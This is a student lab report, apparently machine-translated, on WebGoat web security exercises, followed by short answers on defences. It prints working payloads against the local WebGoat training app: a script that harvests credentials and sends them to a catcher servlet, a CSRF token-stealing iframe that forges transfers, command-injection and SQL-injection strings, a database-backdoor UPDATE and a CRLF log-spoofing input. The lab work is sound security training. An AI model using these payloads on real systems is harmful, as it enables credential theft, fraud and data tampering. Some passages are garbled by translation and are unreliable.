# 2017-2018-2 20155319 "network countermeasure Technology" Exp9:web Security Foundation

2017-2018-2 20155319 "Network countermeasure Technology" EXP9:WEB security basic practice Process

Webgoat Preparation

• Download the jar package from GitHub (there are no downloads in the teacher's virtual machine)
• Copy to local and use the command to java -jar webgoat-container-7.0.1-war-exec.jar run webgoat, info:starting protocolhandler ["http-bio-8080"] is turned on successfully, you can see that 8080 ports are occupied.
• Open Browser input 127.0.0.1:8080/WebGoat , login with default name and password

• In Webgoat, solution is the answer, hints is a hint.

  (i) XSS attacks

  Phishing with XSS

  With XSS and HTML insertion, your goal is to:
  Insert HTML into the request credential, add JavaScript to actually collect the credentials, send the credentials to the http://localhost:8080/WebGoat/catcher?PROPERTY=yes ..., to pass this course, the voucher must be published to the capture servlet.

• Enter a simple code to implement:

  </form><script>function hack(){     XSSImage=new Image;    XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.form.user.value + "&password=" + document.form.pass.value + "";    alert(".....your information was stolen by rhl! User Name = " + document.form.user.value + " Password = " + document.form.pass.value);} </script><form name="form"><br><br><HR><H2>Welcome</H2><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>

• Enter the username password, click Login, Webgoat will capture the information you entered and feedback to you:
  

• Attack Success!

Stored XSS Attacks

• Storage-type XSS attack: XSS attack code is stored in the database, every time when the user opens this page will be executed, harmful, often words message board, every time when the user view message information is triggered. Loading unexpected pages or content when users visit
  

• Enter some content in the title first

• Then enter a string of code in the message<script>alert(" you have been attacked by rhl !");</script>
  

Reflected XSS Attacks

Reflective XSS, non-persistent, you need to deceive users to click the link to trigger the XSS code (the server does not have such a page and content), generally easy to appear in the search page.
*******
Validating all inputs on the server side is always a good practice. XSS can occur when an unauthenticated user input is used in an HTTP response. In a reflected XSS attack, an attacker could use an attack script to make a URL and post it to another website, send an e-mail message, or otherwise have the victim click on it.

• When we enter the wrong user information, the server check input is wrong, return the error page and show us the error content:
• If we use an offensive URL as the input source, the above input<script>alert("This website is not safe");</script>
  

(ii) CSRF attacks

Cross-site scripting attacks: Crossing sites Request forgery

Your goal is to send an e-mail message to the newsgroup. The e-mail message contains an image whose URL points to a malicious request. In this lesson, the URL should point to the attack servlet, which contains the screen and menu parameters for the course, plus an extra parameter, transferfunds (such as 5000), with any number. You can find the "screen" to construct the link "and" menu "values on the right side of the parameter insertion. The recipient of the CSRF email that was authenticated at that time will transfer the funds.

• We enter such a string of code in the message box
  
  Note that the value of screen and menu in this area may not be the same for each person, and can be viewed at the bottom of the current page.
  

XSS boost: CSRF Prompt By-Pass

The goal is to send an e-mail message to a newsgroup that contains multiple malicious requests: the first transfer funds, and the second request confirms the prompt that the first request was triggered. The URL should point to this CSRF hint's attack servlet, pass the Pass Course's screen, menu parameters, and an extra parameter "Trimeboover", which has a numeric value such as "5000" to start a transmission, and a string value "confirm" to complete it. You can copy the course's parameters from the illustration on the right, creating a URL in the "Attack" format. screen = xxx and menu = yyy and transfer funds = ZZZ ". Whoever receives this email happens to be certified at that time and his funds will be transferred. When you think the attack is successful, refresh the page and you will find the green check in the left menu

• Similar to the previous experiment, one more confirmation button

• Input code

• Successful attack
  

CSRF token attack: CSRF token By-Pass

Similar to the CSRF course, your goal is to send e-mail messages to newsgroups that contain malicious requests to transfer funds. To complete successfully, you need to obtain a valid request token. The page that provides the money transfer form contains a valid request token. The URL of the transfer funds page is the "attack" servlet for the "screen" and "menu" Query parameters of this course as well as the additional parameters "Transferfunds=main". Load this page, read the token, and attach a token to the forged request to transfer the data. When you think the attack is successful, refresh the page, and you'll find the green check in the left menu.

• Based on the previous experiment, using tokens to transfer data

• Input code

  <script>var readToken = function(){var doc = document.getElementById("frame1").contentDocumentvar token = doc.getElementsByName("CSRFToken")[0].getAttribute("value");alert(token);var frame2 = document.getElementById("frame2");frame2.src = "attack?Screen=277&menu=900&transferFunds=4000&CSRFToken="+token;}</script><iframe id="frame2" ></iframe><iframe id="frame1" onload="readToken()" src="attack?Screen=277&menu=900&transferFunds=main" ></iframe>

(iii) SQL injection attacks

SQL injection attacks pose a serious threat to any database-driven site. The method behind the attack is easy to learn, resulting in compromises that can be made from quite large to complete systems. Despite these risks, the incredible number of systems on the Internet is susceptible to this form of attack. It is also good practice to clean up all input data, especially data used in OS commands, scripts, and database queries, in some other way, to block the threat of SQL injection.

Command Injection

• Execute the system command on the target host, modify the source code via Firebug in Firefox, right-backdoors.help, select inspect element Show Source code& netstat -an & ipconfig
  

• Select the modified value and point to view, you can see the command is executed, there is a system network connection situation
  

Digital injection: Numeric SQL Injection

• Title Requirements: The following form allows users to view weather data. Attempt to inject an SQL string that causes all weather data to be displayed. Now that you have successfully executed SQL injection, try the same type of attack on the parameterized query.

• Add a 1=1 This kind of eternity can achieve our goal, still use Firebug, in any value such as 101 next to add or 1=1:
  

• Check Columbia, click Go to show the weather for all cities:
  

Log spoofing: Log Spoofing

• As the name implies, is to add false log information to confuse the operating system, the purpose is to let the user name "admin" successful login.
• In the user name Input rhl%0d%0aLogin Succeeded for username: admin ,%0d is a space and%0a is a newline
• Click Login appears two lines, a row of RHL login failed, another line prompts the admin login success, the information will be saved in the log.
  

String injection: String SQL injection

• Here, as before, constructs the SQL injection string based on the SELECT statement, and in the text box, enter‘ or 1=1 --
• The first semicolon is used to close the first semicolon of the last_name, and the second semicolon is used to close the second semicolon of the last_name. A statement is forcibly split into two statements.
• Point go, attack success
  

Lab:sql Injection (Stage 1:string SQL injection)

• Log in as user Larry and enter in the password field‘ or 1=1 --

• Look at the page code and find that the length set here is not enough. Then make the changes:
  

• Success ~
  

SQL injection (Stage 3:numeric SQL injection)

• Follow the same method as before, then click Viewprofile to view the employee information:
  

• Using inspect to analyze this button, and found that this place is the employee ID as an index to pass the parameters, we have to reach through Larry to browse the Boss account information, the boss should generally pay the highest salary, so the value of the values to be changed to101 or 1=1 order by salary desc --
  

• You can view information about your boss:
  

Database backdoors

• First lose a 101, get the user's information
• Input INJECTION statement:101; update employee set Password=000
  

Encounter problems

Q:

• Click Restart. may be the loading problem, not very clear ...

Experimental questions answered

• SQL injection attack principle, how to defend
• The program directly inserts the query statement without judging the legality of the user's input data, and the attacker can add additional SQL statements or use comment characters to get additional information
• Processing of input strings, screening for special characters
• Normal user and system administrator user's permission to have the strict distinction
• The principle of XSS attack, how to defend
• Special character detection when form is submitted
• Limit the length of the input box
• Filtering data in the background
• CSRF attack principle, how to defend
• CSRF is a cross-site scripting attack that executes an attacker's script in the user's browser to obtain information such as its cookie. A web site that typically has an XSS vulnerability is also most likely to have a csrf vulnerability.
• Use token: Each page contains a token generated by the Web server, when submitted, the token is also submitted to the server, the server to determine, if the token is not correct, the location of the CSRF attack.
• Change the submission method to post
• Regularly clean cookies

Experiment Experience

The last experiment was done with a special feeling. Each experiment contact process is very interesting, want to study in depth, hope that there will be time to do the above topics are done again! Also encountered a lot of problems, this software is English version, so use up very laborious, really can only Baidu translation ...

# 2017-2018-2 20155319 "network countermeasure Technology" Exp9:web Security Foundation